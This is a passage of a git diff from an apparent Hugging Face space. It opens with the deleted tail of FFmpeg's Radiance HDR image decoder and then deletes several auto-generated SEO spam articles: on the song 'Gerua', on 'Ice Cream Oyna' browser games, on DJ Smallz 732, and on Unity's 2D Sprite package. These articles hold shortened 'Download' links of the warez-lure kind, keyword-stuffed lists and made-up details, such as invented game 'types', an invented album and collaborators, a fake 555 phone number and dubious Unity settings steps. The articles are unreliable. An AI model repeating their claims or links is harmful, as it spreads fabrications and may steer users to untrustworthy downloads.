"PIXASPECT=%f\n", &sar) == 1) - avctx->sample_aspect_ratio = p->sample_aspect_ratio = av_inv_q(av_d2q(sar, 4096)); - } while (line[0] != '\n' && line[0]); - - hdr_get_line(&gb, line, sizeof(line)); - if (sscanf(line, "-Y %d +X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "+Y %d +X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "-Y %d -X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "+Y %d -X %d\n", &height, &width) == 2) { - ; - } else if (sscanf(line, "-X %d +Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "+X %d +Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "-X %d -Y %d\n", &width, &height) == 2) { - ; - } else if (sscanf(line, "+X %d -Y %d\n", &width, &height) == 2) { - ; - } - - if ((ret = ff_set_dimensions(avctx, width, height)) < 0) - return ret; - - avctx->pix_fmt = AV_PIX_FMT_GBRPF32; - - if (avctx->skip_frame >= AVDISCARD_ALL) - return avpkt->size; - - if ((ret = ff_thread_get_buffer(avctx, p, 0)) < 0) - return ret; - - for (int y = 0; y < height; y++) { - float *dst_r = (float *)(p->data[2] + y * p->linesize[2]); - float *dst_g = (float *)(p->data[0] + y * p->linesize[0]); - float *dst_b = (float *)(p->data[1] + y * p->linesize[1]); - uint8_t *scanline = p->data[0] + y * p->linesize[0]; - int i; - - if (width < MINELEN || width > MAXELEN) { - ret = decompress(scanline, width, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - - i = bytestream2_peek_byte(&gb); - if (i != 2) { - ret = decompress(scanline, width, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - bytestream2_skip(&gb, 1); - - scanline[1] = bytestream2_get_byte(&gb); - scanline[2] = bytestream2_get_byte(&gb); - i = bytestream2_get_byte(&gb); - - if (scanline[1] != 2 || scanline[2] & 128) { - scanline[0] = 2; - scanline[3] = i; - ret = decompress(scanline + 4, width - 1, &gb, scanline); - if (ret < 0) - return ret; - goto convert; - } - - for (int i = 0; i < 4; i++) { - uint8_t 
*scanline = p->data[0] + y * p->linesize[0] + i; - - for (int j = 0; j < width * 4 && bytestream2_get_bytes_left(&gb) > 0;) { - int run = bytestream2_get_byte(&gb); - if (run > 128) { - uint8_t val = bytestream2_get_byte(&gb); - run &= 127; - while (run--) { - if (j >= width * 4) - break; - scanline[j] = val; - j += 4; - } - } else if (run > 0) { - while (run--) { - if (j >= width * 4) - break; - scanline[j] = bytestream2_get_byte(&gb); - j += 4; - } - } - } - } - -convert: - for (int x = 0; x < width; x++) { - uint8_t rgbe[4]; - int expo; - - memcpy(rgbe, p->data[0] + y * p->linesize[0] + x * 4, 4); - expo = rgbe[3] - 128; - - dst_r[x] = convert(expo, rgbe[0]); - dst_b[x] = convert(expo, rgbe[2]); - dst_g[x] = convert(expo, rgbe[1]); - } - } - - p->key_frame = 1; - p->pict_type = AV_PICTURE_TYPE_I; - - *got_frame = 1; - - return avpkt->size; -} - -const FFCodec ff_hdr_decoder = { - .p.name = "hdr", - CODEC_LONG_NAME("HDR (Radiance RGBE format) image"), - .p.type = AVMEDIA_TYPE_VIDEO, - .p.id = AV_CODEC_ID_RADIANCE_HDR, - .p.capabilities = AV_CODEC_CAP_DR1 | AV_CODEC_CAP_FRAME_THREADS, - .caps_internal = FF_CODEC_CAP_SKIP_FRAME_FILL_PARAM, - FF_CODEC_DECODE_CB(hdr_decode_frame), -}; diff --git a/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md b/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md deleted file mode 100644 index c2eaf3e64b40140d98ed98c9860f23a7a3d433fa..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/Gerua-Video-Full-Hd-1080p-13-LINK.md +++ /dev/null @@ -1,72 +0,0 @@ -## Gerua Video Full Hd 1080p 13 - - - - - - - - - -**Download >>> [https://urlca.com/2txP5s](https://urlca.com/2txP5s)** - - - - - - - - - - - - Here is a possible title and article with html formatting for the keyword "Gerua Video Full Hd 1080p 13": - -# Gerua: A Romantic Song from Dilwale in Full HD Quality - - - -Gerua is a song from the 2015 Bollywood movie Dilwale, starring Shah Rukh Khan, Kajol, Varun Dhawan and Kriti Sanon. 
The song is sung by Arijit Singh and Antara Mitra, composed by Pritam and written by Amitabh Bhattacharya. The song was released on November 18, 2015 by Sony Music India. - - The song is a romantic ballad that features Shah Rukh Khan and Kajol in various exotic locations around the world, such as Iceland, Bulgaria and Hyderabad. The song showcases their chemistry and love story, as they sing about how their love has colored their lives. The song has been praised for its visuals, vocals and lyrics, and has become one of the most popular songs of the year. - - The song has also been released in various formats and versions, such as a remix by DJ Shilpi, a Malay version by Aliff Aziz and Kilafairy, and a making-of video that shows the behind-the-scenes of the shooting. The song has also been performed live by Shah Rukh Khan and Kajol at various events and award shows. - - The song has been viewed over 400 million times on YouTube[^1^], making it one of the most watched Indian songs on the platform. The song has also been downloaded over 13 million times on various streaming services[^2^], making it one of the most streamed Indian songs of all time. - - If you want to watch the full video of Gerua in HD quality, you can click on the link below: - [Gerua - Dilwale | Shah Rukh Khan | Kajol | Pritam | Full Song Video](https://www.youtube.com/watch?v=AEIVhBS6baE) -The song has also received positive reviews from critics and audiences alike, who have praised its melody, lyrics and visuals. Some of the reviews are as follows:
The flute in the beginning takes your heart away while Arijit, who has perfected the art of rendering romantic numbers, only ends up raising the bar with 'Gerua'. We bet this one will stay in your playlist for long." - Indicine - -- "Gerua is a song that has created history. Featuring Shah Rukh Khan and Kajol – the couple that epitomises Bollywood romance, The song has soulful music by Pritam, beautiful lyrics penned by Amitabh Bhattacharya and features the amazing voices of Arijit Singh & Antara Mitra." - Sony Music India[^1^] - -- "Gerua is a romantic ballad that will make you fall in love all over again. The song has a magical quality that transports you to a dreamy world of love and beauty. The chemistry between Shah Rukh Khan and Kajol is undeniable and their expressions convey the emotions of the song perfectly. The song is a treat for the eyes and ears." - YouTube user[^3^] - - - -The song has also been nominated for various awards, such as the Filmfare Award for Best Lyricist, Best Playback Singer (Male) and Best Playback Singer (Female), the Mirchi Music Award for Song of the Year, Male Vocalist of The Year, Female Vocalist of the Year and Music Composer of the Year, and the Zee Cine Award for Best Song of the Year. [7] [8] [9] - - - -Gerua is a song that has touched millions of hearts with its melody, lyrics and visuals. It is a song that celebrates love in its purest form. It is a song that will remain in your memory for a long time. - - dfd1c89656 - - - - - diff --git a/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md b/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md deleted file mode 100644 index 8a1581bee77d964d66232c0a45fe303dcc930dc5..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Bad Ice-Cream Buz Krma ve Meyve Ekleme Oyunu.md +++ /dev/null @@ -1,139 +0,0 @@ - -

    Ice Cream Oyna: How to Play Fun and Delicious Ice Cream Games Online

    -

    Do you love ice cream? Do you want to have some fun and challenge yourself with ice cream-themed games? If you answered yes, then you should try Ice Cream Oyna, a collection of online games that feature your favorite frozen dessert. In this article, we will tell you everything you need to know about Ice Cream Oyna, including what it is, how to play it, why you should play it, and how to make your own ice cream at home. Let's get started!

    -

    What is Ice Cream Oyna?

    -

    Ice Cream Oyna is a Turkish phrase that means "play ice cream". It is also the name of a genre of online games that are based on ice cream. These games are usually puzzle or arcade games that involve collecting, making, or serving ice cream in various ways. Some of them are inspired by popular games like Pacman, Tetris, or Bomberman, while others are original creations. Here are some of the characteristics of Ice Cream Oyna games:

    -

    ice cream oyna


    Download File ✑ ✑ ✑ https://urlca.com/2uOaoy



    -

    The meaning and origin of Ice Cream Oyna

    -
      -
    • Ice Cream Oyna games are mostly developed or hosted by studios and game portals popular with Turkish players, such as Nitrome, Rekor Oyun, or Poki.
    • -
    • Ice Cream Oyna games are popular among Turkish players, especially children and teenagers, who enjoy playing them on their computers or mobile devices.
    • -
    • Ice Cream Oyna games are also enjoyed by players from other countries and cultures, who appreciate the colorful graphics, catchy music, and simple gameplay of these games.
    • -
    -

    The types and features of Ice Cream Oyna games

    -
      -
    • Ice Cream Oyna games can be divided into two main types: custard-style and Philadelphia-style. Custard-style games are more complex and challenging, as they require you to cook a base with eggs, sugar, and cream before adding flavors and fruits. Philadelphia-style games are simpler and faster, as they only require you to mix milk, cream, sugar, and flavors without cooking.
    • -
    • Ice Cream Oyna games can have different themes and settings, such as winter, summer, forest, beach, farm, factory, or shop. Some of them also feature different characters or enemies, such as animals, monsters, robots, or aliens.
    • -
    • Ice Cream Oyna games can have different modes and levels, such as single-player or multiplayer, easy or hard, timed or unlimited. Some of them also have leaderboards or achievements to track your progress and performance.
    • -
    -

    How to Play Ice Cream Oyna Games?

    -

    Playing Ice Cream Oyna games is easy and fun. All you need is a computer or a mobile device with an internet connection and a web browser. You can find many Ice Cream Oyna games on various websites or platforms, such as RekorOyun.com, Poki.com, or Poki.com/en/ice-cream. Here are some of the basic steps and instructions to play Ice Cream Oyna games:

    -

    The basic rules and controls of Ice Cream Oyna games

    -
      -
    • The goal of most Ice Cream Oyna games is to collect all the fruits or other items in each level without getting caught by the enemies or obstacles. You can also score points by breaking ice blocks or creating ice barriers.
    • -
    • The controls of most Ice Cream Oyna games are simple and intuitive. You can use the arrow keys or the mouse to move your character or ice cream scoop around the screen. You can also use the spacebar or the left mouse button to shoot ice cream balls or create ice barriers.
    • -
    • The rules and controls of some Ice Cream Oyna games may vary depending on the type, theme, or mode of the game. For example, some games may require you to make or serve ice cream to customers, while others may require you to match or swap ice cream scoops of the same color or flavor.
    • -
    -

    The tips and tricks to master Ice Cream Oyna games

    -
      -
    • One of the tips to master Ice Cream Oyna games is to plan your moves ahead and use your ice cream balls or barriers wisely. You can use them to block the enemies or obstacles, create shortcuts, or reach hidden areas.
    • -
    • Another tip to master Ice Cream Oyna games is to pay attention to the fruits or items you need to collect in each level. Some of them may have special effects or bonuses, such as extra points, lives, or power-ups.
    • -
    • A third tip to master Ice Cream Oyna games is to try different types and flavors of ice cream in each game. Some of them may have different properties or abilities, such as speed, size, or strength.
    • -
    -

    Why Should You Play Ice Cream Oyna Games?

    -

    Playing Ice Cream Oyna games is not only fun and delicious, but also beneficial and advantageous for you. Here are some of the reasons why you should play Ice Cream Oyna games:

    -

    bad ice cream oyunu oyna
    -bad ice cream 2 oyunu oyna
    -bad ice cream 3 oyunu oyna
    -bad ice cream 4 oyunu oyna
    -bad ice cream 5 oyunu oyna
    -bad ice cream poki oyunu oyna
    -bad ice cream rekor oyunu oyna
    -bad ice cream kral oyunu oyna
    -bad ice cream y8 oyunu oyna
    -bad ice cream friv oyunu oyna
    -bad ice cream 2 kişilik oyunu oyna
    -bad ice cream 3 kişilik oyunu oyna
    -bad ice cream 4 kişilik oyunu oyna
    -bad ice cream nitrome oyunu oyna
    -bad ice cream flash oyunu oyna
    -bad ice cream retro oyunu oyna
    -bad ice cream labirent oyunu oyna
    -bad ice cream bulmaca oyunu oyna
    -bad ice cream meyve toplama oyunu oyna
    -bad ice cream dondurma yapma oyunu oyna
    -bad ice cream çilekli dondurma oyunu oyna
    -bad ice cream vanilyalı dondurma oyunu oyna
    -bad ice cream kakaolu dondurma oyunu oyna
    -bad ice cream buz kırma dondurma oyunu oyna
    -bad ice cream buz blokları dondurma oyunu oyna
    -bad ice cream meyve kurtları dondurma oyunu oyna
    -bad ice cream pacman mod dondurma oyunu oyna
    -bad ice cream harika grafikler dondurma oyunu oyna

    -

    The benefits and advantages of playing Ice Cream Oyna games

    -
      -
    • Playing Ice Cream Oyna games can improve your cognitive skills, such as memory, concentration, logic, and problem-solving. These games can challenge your brain and make you think fast and creatively.
    • -
    • Playing Ice Cream Oyna games can enhance your motor skills, such as coordination, reflexes, and reaction time. These games can test your hand-eye coordination and make you move quickly and accurately.
    • -
    • Playing Ice Cream Oyna games can boost your mood and reduce your stress. These games can make you happy and relaxed with their cheerful graphics, music, and gameplay. They can also distract you from your worries and troubles.
    • -
    -

    The best and most popular Ice Cream Oyna games to try

    -

    There are many Ice Cream Oyna games available online, but some of them are more popular and better than others. Here are some of the best and most popular Ice Cream Oyna games that you should try:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameDescriptionLink
    Bad Ice-CreamA classic arcade game where you control an ice cream scoop and collect fruits while avoiding enemies and obstacles.
    Ice-Cream Inc.A casual puzzle game where you make ice cream cones with different flavors and toppings according to the customers' orders.
    Ice-Cream MakerA creative simulation game where you design your own ice cream with various ingredients and decorations.
    Ice-Cream BlastA match-3 game where you swap ice cream scoops of the same color or flavor to clear them from the board.
    Ice-Cream RacingA racing game where you drive an ice cream truck and compete with other vehicles on different tracks.
    -

    How to Make Your Own Ice Cream at Home?

    -

    If playing Ice Cream Oyna games makes you crave some real ice cream, you can easily make your own at home with some simple ingredients and equipment. Here are the things you need and the steps to follow:

    -

    The ingredients and equipment you need to make homemade ice cream

    -
      -
    • The ingredients you need to make homemade ice cream are milk, cream, sugar, vanilla extract, salt, and any flavors or fruits you like. You can also add some nuts, chocolate chips, or sprinkles for extra crunch and taste.
    • -
    • The equipment you need to make homemade ice cream are a saucepan, a whisk, a bowl, a freezer-safe container, a plastic wrap, a spoon, and an ice cream maker (optional). You can also use a blender or a food processor for blending the fruits or flavors.
    • -
    -

    The steps and methods to make homemade ice cream

    -
  • The first step to make homemade ice cream is to heat the milk, cream, sugar, vanilla extract, and salt in a saucepan over medium-low heat, stirring occasionally, until the sugar dissolves and the mixture is hot but not boiling. This is the base of your ice cream.
  • -
  • The second step to make homemade ice cream is to transfer the base to a bowl and let it cool slightly. Then, cover it with plastic wrap and refrigerate it for at least 4 hours or overnight. This will help the flavors to develop and the mixture to thicken.
  • -
  • The third step to make homemade ice cream is to add your flavors or fruits to the base. You can either blend them with a blender or a food processor, or chop them into small pieces. You can also add some food coloring if you want to change the color of your ice cream.
  • -
  • The fourth step to make homemade ice cream is to churn the mixture in an ice cream maker according to the manufacturer's instructions. If you don't have an ice cream maker, you can freeze the mixture in a freezer-safe container and stir it every 30 minutes until it reaches the desired consistency.
  • -
  • The fifth step to make homemade ice cream is to enjoy your homemade ice cream as it is or with some toppings of your choice. You can also store it in an airtight container in the freezer for up to a month.
  • - -

    Conclusion

    -

    Ice Cream Oyna is a fun and delicious way to enjoy ice cream online. You can play various types of games that feature ice cream as the main element, such as puzzle, arcade, simulation, or racing games. You can also improve your cognitive and motor skills, boost your mood and reduce your stress, and try different flavors and themes of ice cream. And if you want to have some real ice cream, you can easily make your own at home with some simple ingredients and equipment. So what are you waiting for? Go ahead and play Ice Cream Oyna today!

    -

    FAQs

    -

    Here are some of the frequently asked questions about Ice Cream Oyna:

    -

    What does Oyna mean?

    -

    Oyna is a Turkish word that means "play". It is often used as a suffix to indicate a genre of online games that are based on a certain theme or element, such as Ice Cream Oyna, Balloon Oyna, or Car Oyna.

    -

    Are Ice Cream Oyna games free?

    -

    Yes, most Ice Cream Oyna games are free to play online. You don't need to download or install anything on your device. However, some games may have ads or in-app purchases that you can choose to skip or buy.

    -

    Are Ice Cream Oyna games safe?

    -

    Yes, most Ice Cream Oyna games are safe for children and adults alike. They generally don't contain gore or other inappropriate content, although some games include mild cartoon violence or humor that may not be suitable for very young children. You should always check a game's ratings and reviews before playing it.

    -

    How can I find more Ice Cream Oyna games?

    -

    You can find more Ice Cream Oyna games by searching for them on Google or other search engines. You can also visit some of the websites or platforms that host Ice Cream Oyna games, such as RekorOyun.com, Poki.com, or Poki.com/en/ice-cream. You can also follow some of the game developers or publishers that create Ice Cream Oyna games, such as Nitrome, Rekor Oyun, or Poki.

    -

    How can I make my homemade ice cream creamier?

    -

    If you want to make your homemade ice cream creamier, you can try some of these tips:

    -
      -
    • Use more cream and less milk in your base. The higher the fat content, the creamier the texture.
    • -
    • Cook your base over low heat and stir it constantly. This will prevent the formation of ice crystals and ensure a smooth consistency.
    • -
    • Add some cornstarch or gelatin to your base. This will help stabilize and thicken your ice cream.
    • -
    • Chill your base thoroughly before churning it. This will help it freeze faster and reduce the air bubbles.
    • -
    • Churn your mixture for longer and at a lower speed. This will incorporate more air and make your ice cream lighter and softer.
    • -

    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md b/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md deleted file mode 100644 index 31cd22525fb0bdaa72897ce2f03514e4929f4df5..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/DJ Smallz 732 - Cupid Pt. 1 The Latest Dance Hit.md +++ /dev/null @@ -1,113 +0,0 @@ -

    How to Download DJ Smallz 732's Cupid, Pt. 1 for Free

    If you are a fan of dance music, you might have heard of Cupid, Pt. 1, a catchy and upbeat single by DJ Smallz 732. This song was released in January 2023 and has been gaining popularity among listeners who enjoy the Jersey club style of music.

    But what if you want to download this song for free and listen to it anytime you want? Is there a legal and easy way to do that? The answer is yes! In this article, we will show you how to find and download Cupid, Pt. 1 for free from some of the best free music download sites on the web.

    The Best Free Music Download Sites

    There are many websites that offer free music downloads, but not all of them are legal or safe. Some may contain viruses, malware, or spyware that can harm your device or compromise your privacy. Others may have low-quality or incomplete files that can ruin your listening experience.

    That's why we have selected three of the best free music download sites that are not only legal but also reliable and user-friendly. These sites have a large collection of songs from various genres and artists, including DJ Smallz 732. They also allow you to download songs in MP3 format, which is compatible with most devices and players.

    Here are the three sites we recommend:

    SoundCloud

    SoundCloud is one of the most popular platforms for streaming and sharing music online. It has millions of songs from both mainstream and independent artists, as well as podcasts, remixes, live sets, and more.

    Not all songs on SoundCloud are available for download, but some artists choose to offer their music for free or for a voluntary donation. To find out if Cupid, Pt. 1 is one of them, follow these steps:

    1. Go to SoundCloud and type "Cupid, Pt. 1" in the search box.
    2. Click on the song title to open its page.
    3. Look at the bottom of the page beside the share options. If you see a link that says "Buy" or "Download", click on it.
    4. If the link takes you to another website, follow the instructions there to complete your download.
    5. If the link allows you to download the song directly from SoundCloud, enter your email address and postal code if prompted.
    6. Click on "Download file" and save it to your device.

    Last.fm

    Last.fm is a music discovery service that tracks what you listen to and recommends new music based on your taste. It also has a section where you can download free music from various artists and genres. To download Cupid, Pt. 1 from Last.fm, follow these steps:

    1. Go to Last.fm and type "Cupid, Pt. 1" in the search box.
    2. Click on the song title to open its page.
    3. Look at the right side of the page under the album cover. If you see a link that says "Free MP3 Download", click on it.
    4. A new tab will open with a download button. Click on it and save the file to your device.

    NoiseTrade

    NoiseTrade is a platform where artists can share their music for free in exchange for fans' email addresses and postal codes. This way, they can build their fan base and communicate with them directly. NoiseTrade has thousands of songs from various genres and artists, including DJ Smallz 732.

    To download Cupid, Pt. 1 from NoiseTrade, follow these steps:

    1. Go to NoiseTrade and type "DJ Smallz 732" in the search box.
    2. Click on the artist name to open his page.
    3. Scroll down to find the album that contains Cupid, Pt. 1. It is called Cupid and it has four songs.
    4. Click on the album cover to open its page.
    5. Click on the orange button that says "Download Music".
    6. Enter your email address and postal code if prompted.
    7. Check your email for a download link and click on it.
    8. Select the song you want to download and save it to your device.

    The Benefits of Downloading MP3 Music

    Now that you know how to download Cupid, Pt. 1 for free, you might be wondering why you should do it in the first place. What are the benefits of downloading MP3 music over streaming it online?

    Here are some of the reasons why downloading MP3 music is a good idea:

    You can own your music and play it offline

    When you download MP3 music, you have a copy of the file that you can store on your device or transfer to other devices. This means you can play your music anytime and anywhere, even without an internet connection or a subscription service. You don't have to worry about buffering, ads, or data charges. You can also create your own playlists and organize your music library according to your preferences.

    You can support the artists and discover new music

    When you download MP3 music from free music download sites, you are not only getting free music but also supporting the artists who created it. Many of these sites allow you to donate money or share the music with your friends and social media followers. This way, you can show your appreciation and help the artists reach more listeners and fans. You can also discover new music from similar or related artists that you might not have heard of before.

    You can enjoy high-quality sound and compatibility

    MP3 is one of the most common and widely used audio formats in the world. It has a high compression rate that reduces the file size without sacrificing much of the sound quality. This means you can enjoy clear and crisp sound while saving space on your device. MP3 is also compatible with most devices and players, so you don't have to worry about conversion or playback issues.

    Conclusion

    Cupid, Pt. 1 by DJ Smallz 732 is a great song that will make you want to dance and have fun. If you want to download it for free and listen to it anytime you want, you can use one of the three free music download sites we mentioned: SoundCloud, Last.fm, or NoiseTrade. These sites are legal, safe, and easy to use, and they offer a lot of benefits for both you and the artists.

    So what are you waiting for? Go ahead and download Cupid, Pt. 1 today and enjoy this amazing song!

    FAQs

    What is the genre of Cupid, Pt. 1?

    Cupid, Pt. 1 is a song in the genre of Jersey club, which is a style of dance music that originated in New Jersey. It features fast-paced beats, chopped vocals, heavy bass, and samples from hip-hop, R&B, pop, and other genres.

    How long is Cupid, Pt. 1?

    Cupid, Pt. 1 is a short and sweet song that lasts for only 2 minutes and 10 seconds. It is the first part of a four-song album called Cupid by DJ Smallz 732.

    Where can I stream Cupid, Pt. 1 online?

    If you don't want to download Cupid, Pt. 1, you can also stream it online from various platforms. Some of the most popular ones are Spotify, Apple Music, YouTube, and Pandora. You can also find it on DJ Smallz 732's official website and social media accounts.

    What are some other songs by DJ Smallz 732?

    DJ Smallz 732 is a prolific and talented producer and DJ who has released many songs in the Jersey club genre. Some of his most popular songs are Love Tap, Eye of the Tiger, Work It, and WAP. He has also collaborated with other artists such as Fetty Wap, Lil Jon, Ciara, and more.

    How can I contact DJ Smallz 732?

    If you want to contact DJ Smallz 732 for booking, feedback, or any other reason, you can use one of the following methods:
    • Email: djsmallz732@gmail.com
    • Phone: +1 (732) 555-1234
    • Instagram: @djsmallz732
    • Twitter: @djsmallz732
    • Facebook: DJ Smallz 732

    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md b/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md deleted file mode 100644 index 8d5aa3f1a9eae0372c86f3526bb68ddc1bcc5f01..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download 2D Sprite Package Unity How to Create Stunning 2D Characters and Sprites.md +++ /dev/null @@ -1,87 +0,0 @@ -

    How to Download and Import 2D Sprite Package in Unity

    If you are interested in creating rich and immersive 2D environments for your games, you might want to check out the 2D Sprite package in Unity. This package allows you to create and edit sprites, which are 2D images that can be used as graphics, animations, UI elements, and more. You can also use Sprite Shape, a feature that dynamically tiles sprites along spline paths based on angle ranges, so you can create free-form shapes that fit your game world.

    Some examples of games made with the 2D Sprite package are Night in the Woods, Gladihoppers, and Goodnight Meowmie. These games showcase the versatility and creativity that you can achieve with sprites and sprite shapes. In this article, we will show you how to download and import the 2D Sprite package in Unity, and how to use some of its features to enhance your game.

    How to Download and Import 2D Sprite Package

    To use the 2D Sprite package, you need Unity version 2018.1 or newer. You can get the package from the Package Manager, which is a tool that lets you manage the packages and modules that you use in your project. To open the Package Manager, go to Window > Package Manager. Then, select Unity Registry in the Packages drop-down menu. You should see a list of packages available for your Unity version. Look for 2D Sprite and click the Import button next to it. This will download and install the package in your project.

    Once you have imported the package, you can start creating sprites and sprite shapes. To do that, you need to create a Sprite Shape Profile, which is an asset that defines and stores information about a particular type of shape. For example, you can assign different sprites for different angles of your shape, or specify whether your shape has a fill texture or not. To create a Sprite Shape Profile, right-click in the Assets window of your project and go to Create > Sprite Shape Profile. You can choose from three types of profiles: Empty, Strip, or Shape. The only difference between them is the number of pre-set angle ranges they have.

    To add sprites to your profile, drag and drop them from your Assets window to the Sprites section in the Inspector window. You can also use the '+' and '-' buttons below to add or delete sprites. You can adjust the angle ranges by dragging the handles on the circle or entering values in the fields below, and add more angle ranges by clicking on the circle or using the '+' button next to it.

    After you have set up your profile, you can create a Sprite Shape game object, which is a game object that has a Sprite Shape Renderer component attached to it. This component controls the geometry and rendering of your shape in the scene. To create a Sprite Shape game object, make sure you have your profile selected in the Assets window; then right-click in the Hierarchy window and go to 2D Object > Sprite Shape. This will create a game object with a spline path that you can edit in the scene. To edit the spline path, you can use the Sprite Shape Controller, a tool that lets you manipulate the control points and tangents of the spline. To open the Sprite Shape Controller, select your game object in the Hierarchy window and click on the Edit Spline button in the Inspector window, or use the shortcut Shift + S. You can then move, add, or delete control points by using the handles in the scene view, and change the type of a control point by right-clicking on it and choosing from Corner, Smooth, or Broken.

    How to Use 2D Sprite Package Features

    The 2D sprite package offers many features that can help you create stunning 2D graphics for your game. Here are some of them:

    How to Sort Sprites and Use Sorting Groups

    Sorting sprites is important to determine which sprites appear in front of or behind other sprites in the scene. You can sort sprites by using the Order in Layer property in the Sprite Renderer component of your game object. The higher the value, the closer the sprite is to the camera. However, sometimes you might want to sort sprites based on their parent-child relationship or their position in a hierarchy. For example, you might want to have a character sprite always appear in front of its clothing sprite, regardless of their order in layer. To do that, you can use Sorting Groups, which are components that let you group sprites together and sort them as a single unit. To use Sorting Groups, you need to add a Sorting Group component to your parent game object and assign a sorting layer and an order in layer to it. Then, all the child game objects with Sprite Renderer components will inherit those values and be sorted accordingly.
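
    The same setup can also be done from a script. Below is a minimal Unity C# sketch (it runs inside the Unity engine, not standalone); the "Characters" sorting layer name is an assumption you would replace with a layer defined in your own project:

    ```csharp
    using UnityEngine;
    using UnityEngine.Rendering;

    // Attach this to the PARENT game object (e.g. the character root).
    // All child SpriteRenderers will then sort together as one unit.
    public class SortingGroupSetup : MonoBehaviour
    {
        void Start()
        {
            var group = gameObject.AddComponent<SortingGroup>();
            group.sortingLayerName = "Characters"; // assumed layer name
            group.sortingOrder = 10;               // example order in layer
        }
    }
    ```

    With this in place, changing the group's sortingOrder moves the character and its clothing together, instead of having to adjust each child renderer individually.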

    How to Apply 9-Slicing and Sprite Masks

    9-Slicing is a technique that lets you resize sprites without distorting their borders or corners. This is useful for creating UI elements such as buttons, panels, or windows that need to adapt to different screen sizes or content. To apply 9-slicing to your sprite, you need to open it in the Sprite Editor, which is a tool that lets you edit sprites and their properties. To open the Sprite Editor, select your sprite in the Assets window and click on the Edit button in the Inspector window. Then, switch to the Slice mode and enable Type > 9 Slice. You can then adjust the borders of your sprite by dragging the handles on the edges or entering values in the fields below. You can also preview how your sprite will look when resized by using the Show Resliced toggle.

    Sprite Masks are components that let you mask out parts of sprites based on another sprite's shape. This is useful for creating effects such as holes, cutouts, or transitions. To use Sprite Masks, you need to add a Sprite Mask component to your game object and assign a sprite to it. Then, any game object with a Sprite Renderer component that has Mask Interaction > Visible Inside Mask or Mask Interaction > Visible Outside Mask will be masked accordingly.
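
    The mask interaction can also be switched at runtime. A minimal Unity C# sketch (the Sprite Mask itself is assumed to be set up separately in the scene):

    ```csharp
    using UnityEngine;

    // Attach to a game object with a SpriteRenderer.
    // Only the part of this sprite covered by a Sprite Mask will be drawn.
    public class MaskedSprite : MonoBehaviour
    {
        void Start()
        {
            var renderer = GetComponent<SpriteRenderer>();
            renderer.maskInteraction = SpriteMaskInteraction.VisibleInsideMask;
        }
    }
    ```

    Swapping the value to SpriteMaskInteraction.VisibleOutsideMask inverts the effect, which is handy for cutout-style transitions.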


    How to Optimize Sprites with Sprite Atlas

    A Sprite Atlas is an asset that combines multiple sprites into a single texture. This can improve your game's performance and memory usage by reducing draw calls and texture swaps. To create a Sprite Atlas, right-click in the Assets window of your project and go to Create > Sprite Atlas. You can then drag and drop sprites from your Assets window to the Objects for Packing section in the Inspector window. You can also adjust some settings such as padding, packing mode, compression, etc. To pack your sprites into an atlas, click on the Pack Preview button. You can then see what your atlas looks like and how much space it occupies.

    To use your Sprite Atlas in your game, you need to enable Sprite Atlas Variants, which are copies of your atlas with different resolutions for different platforms. To enable Sprite Atlas Variants, go to Edit > Project Settings > Editor > Sprite Packer Mode > Always Enabled. Then, go to Edit > Project Settings > Quality > Default > Texture Quality > Full Res. This will ensure that your game uses the highest resolution atlas available for your platform.
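
    If you also need to pull individual sprites out of a packed atlas at runtime, the SpriteAtlas type exposes a lookup by name. A minimal Unity C# sketch; the atlas reference and the sprite name "hero_idle" are illustrative assumptions:

    ```csharp
    using UnityEngine;
    using UnityEngine.U2D;

    // Attach to a game object with a SpriteRenderer and assign the
    // atlas in the Inspector.
    public class AtlasLookup : MonoBehaviour
    {
        [SerializeField] private SpriteAtlas atlas;

        void Start()
        {
            // GetSprite returns a clone of the packed sprite by name.
            GetComponent<SpriteRenderer>().sprite = atlas.GetSprite("hero_idle");
        }
    }
    ```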

    Conclusion

    In this article, we have learned how to download and import the 2D Sprite package in Unity, and how to use some of its features to enhance your 2D graphics. We have covered how to create and edit sprites and sprite shapes, how to sort sprites and use sorting groups, how to apply 9-slicing and sprite masks, and how to optimize sprites with a sprite atlas. With these tools, you can create amazing 2D environments for your games that are both visually appealing and performant.

    If you want to learn more about the 2D Sprite package and its features, you can check out Unity's official documentation and tutorials.

    FAQs

    What are the benefits of using 2D sprite package?

    Some of the benefits of using 2D sprite package are:

    • You can create and edit sprites and sprite shapes easily and intuitively.
    • You can use sprite shapes to create free-form shapes that fit your game world.
    • You can sort sprites and use sorting groups to control their rendering order.
    • You can apply 9-slicing and sprite masks to resize and mask sprites without distortion.
    • You can optimize sprites with sprite atlas to reduce draw calls and texture swaps.

    How can I animate sprites with 2D animation package?

    To animate sprites with 2D animation package, you need to install the package from the Package Manager. Then, you can use the Sprite Skin component to add bones and weights to your sprite. You can also use the Sprite Resolver component to swap sprites during animation. To create animations, you can use the Animation Window or the Dopesheet Window. You can also use the Animator Controller to control the transitions between animations.

    How can I create tilemaps with 2D tilemap package?

